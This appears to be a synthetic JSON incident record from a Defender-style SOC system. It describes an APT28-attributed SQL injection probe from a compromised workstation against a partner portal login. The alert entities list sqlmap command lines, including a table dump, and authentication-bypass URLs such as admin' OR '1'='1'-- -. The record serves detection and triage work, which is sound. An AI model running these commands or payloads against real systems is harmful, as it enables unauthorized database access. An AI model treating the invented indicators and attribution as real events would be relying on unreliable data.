{
    "alerts": [
        {
            "alertId": "ALT-SQLI-001-0",
            "category": "Exploitation",
            "computerDnsName": "CAD01-TCORP.oresund-industrial.dk",
            "detectionSource": "Microsoft Defender for Endpoint",
            "entities": {
                "domains": [
                    "update-oresund.com"
                ],
                "emails": [
                    "eng.larsen@oresund-industrial.dk"
                ],
                "fileHashes": [
                    "5d41402abc4b2a76b9719d911017c592"
                ],
                "ips": [
                    "192.168.30.10",
                    "172.16.100.10"
                ],
                "processes": [
                    "python3.exe sqlmap.py -u http://172.16.100.10/portal/login --data \"username=admin&password=test\" --technique=B --level=5 --batch",
                    "python3.exe sqlmap.py -u http://172.16.100.10/portal/login --data \"username=admin' OR '1'='1'-- -&password=x\" --dump --tables"
                ],
                "urls": [
                    "http://172.16.100.10/portal/login?username=admin' OR '1'='1'-- -&password=x",
                    "http://172.16.100.10/portal/login?username=admin'--&password="
                ]
            },
            "firstActivity": "2026-04-29T03:47:02.095331+00:00",
            "lastActivity": "2026-04-29T05:07:02.095331+00:00",
            "machineId": "CAD01-TCORP",
            "severity": "High",
            "title": "SQL injection tool (sqlmap) execution detected on CAD01-TCORP"
        }
    ],
    "assignedTo": "soc.analyst@oresund-industrial.dk",
    "classification": "TruePositive",
    "comments": [
        {
            "comment": "sqlmap detected probing the partner portal login endpoint. Originated from compromised engineering workstation CAD01-TCORP.",
            "createdBy": "soc.analyst@oresund-industrial.dk",
            "createdTime": "2026-04-29T05:07:02.095331+00:00"
        }
    ],
    "createdTime": "2026-04-29T04:07:02.095331+00:00",
    "determination": "MaliciousUserActivity",
    "impactedEntities": {
        "machines": 2,
        "mailboxes": 0,
        "users": 0
    },
    "incidentId": "INC-SQLI-001",
    "incidentName": "APT28 - Web Application Attack on WEB01-TCORP",
    "lastUpdateTime": "2026-04-29T05:37:02.095331+00:00",
    "mitreTechniques": [
        "T1190",
        "T1059.001",
        "T1505.003"
    ],
    "severity": "High",
    "status": "Active",
    "summary": "APT28 gained foothold on CAD01-TCORP and used sqlmap to probe the partner portal on WEB01-TCORP for SQL injection vulnerabilities. Authentication bypass payloads were captured in web server logs.",
    "tags": [
        "APT28",
        "Cobalt Strike",
        "\u00d8resund Industrial",
        "WebAttack"
    ],
    "threatFamily": "Cobalt Strike"
}